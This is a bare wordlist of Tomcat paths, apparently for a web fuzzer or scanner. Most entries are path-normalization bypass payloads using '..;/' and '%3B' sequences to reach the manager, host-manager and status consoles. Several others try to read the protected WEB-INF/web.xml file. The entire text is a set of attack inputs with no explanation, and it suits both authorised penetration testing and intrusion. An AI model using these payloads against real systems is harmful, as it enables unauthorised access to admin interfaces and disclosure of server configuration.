manager/html
..%3B/manager/html
xx/..%3B/manager/html
%3B/..%3B/manager/html
manager/x/..;/html
manager;X=Y/html
host-manager/html
..%3B/host-manager/html
xx/..%3B/host-manager/html
%3B/..%3B/host-manager/html
host-manager/x/..%3B/html
host-manager;X=Y/html
manager/status
..%3B/manager/status
xx/..%3B/manager/status
%3B/..%3B/manager/status
manager/x/..;/status
manager;X=Y/status
manager/text
..%3B/manager/text
xx/..%3B/manager/text
%3B/..%3B/manager/text
manager/x/..;/text
manager;X=Y/text
WEB-INF/web.xml
./WEB-INF/web.xml
.//WEB-INF/web.xml
docs/introduction.html
examples/servlets
